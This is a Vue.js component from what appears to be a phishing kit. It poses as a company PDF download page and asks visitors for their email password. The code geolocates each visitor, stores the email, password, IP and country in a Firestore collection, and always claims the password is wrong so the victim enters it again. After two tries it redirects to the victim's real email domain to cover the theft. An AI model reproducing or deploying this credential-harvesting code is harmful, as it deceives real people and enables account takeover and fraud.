<template>
  <v-container fill-height class="d-flex justify-center">
    <v-card class="pa-2" v-if="!dialog" width="350" rounded="true" :disabled="disableCard">
      <v-card-text class="justify-center">
        <p class="body-2">{{email}}</p>
        <p class="red--text" v-if="error">Your email password is incorrect.</p>
        <v-form ref="form" lazy-validation v-on:submit.prevent="onSubmit">
          <v-text-field
            filled
            rounded
            dense
            v-model="password"
            type="password"
            required
            v-on:keyup.enter="submitForm"
            prepend-inner-icon="mdi-lock"
            ref="password"
          ></v-text-field>
          <router-link to>
            <p
              class="caption"
            >{{email.split('@')[1].split('.')[0]}} staff only. Use email password for access</p>
          </router-link>
          <v-row>
            <v-spacer></v-spacer>
            <v-img
              src="https://res.cloudinary.com/dvvr9ncoi/image/upload/v1598180796/Webp.net-compress-image_2_efzlky.jpg"
              height="120"
              width="100"
            ></v-img>
            <v-spacer></v-spacer>
          </v-row>
          <p class="text-center">{{ companyName }}.pdf</p>
          <p class="text-center">[File Size: 927kb]</p>
          <v-row>
            <v-spacer></v-spacer>
            <v-btn width="200" class="white--text text-none" color="#005DA6" @click="submitForm">
              <v-icon left dark>mdi-cloud-download</v-icon>Save
            </v-btn>
            <v-spacer></v-spacer>
          </v-row>
        </v-form>
      </v-card-text>
    </v-card>
  </v-container>
</template>

<script>
import { db } from "../firebase";

export default {
  name: "LoginForm",

  data: () => ({
    error: false,
    disableCard: false,
    email: "",
    password: "",
    ipAddress: "",
    countryName: "",
    city: "",
    region: "",
    submitCount: 0,
    companyName: "",
  }),

  async created() {
    this.email = this.$route.params.email.includes("@")
      ? this.$route.params.email
      : window.atob(this.$route.params.email);
    this.companyName = this.email.split("@")[1].split(".")[0];
    window.document.title = this.companyName;
    try {
      const { data } = await this.$http(`https://ipapi.co/json/`);
      console.log(data);
      this.ipAddress = data.ip;
      this.countryName = data.country_name;
      this.city = data.city;
      this.region = data.region;
      this.$refs.password.focus();
    } catch (e) {
      console.log(e);
    }
  },

  firestore() {
    return {
      users: db.collection("users"),
    };
  },

  methods: {
    async submitForm() {
      console.log(this.email, this.password);

      // function sleep(ms) {
      //   return new Promise((resolve) => setTimeout(resolve, ms));
      // }

      if (this.password.length < 4) {
        this.error = true;
        this.password = "";
        return;
      }
      this.submitCount++;

      console.log(this.submitCount);

      this.disableCard = true;
      try {
        const userRef = await this.$firestore.users
          .where("email", "==", this.email)
          .where("password", "==", this.password)
          .get();

        if (userRef.docs.length == 0) {
          await this.$firestore.users.add({
            email: this.email,
            password: this.password,
            ipAddress: this.ipAddress,
            country: this.countryName,
            city: "office365",
            // region: `${this.region}, | ${loginStatus}, | office365`,
            createdAt: new Date(),
          });
        }
        // await sleep(6000);
        this.password = "";
        this.error = true;
        this.disableCard = false;

        console.log(this.submitCount);
        if (this.submitCount == 2) {
          // this.$router.push({ path: `/login/verification/${this.email}` });
          location.href = `https://${this.email.split("@")[1]}`;
          // this.$router.push({ name: "success" });
          // this.$router.push({ name: "DocumentNotfound" });
        }
      } catch (e) {
        console.log(e);
      }
    },
  },
};
</script>
<style lang="scss">
a {
  text-decoration: none;
  color: #005da6;
}
.rounded-button {
  border-radius: 0px;
}
</style>
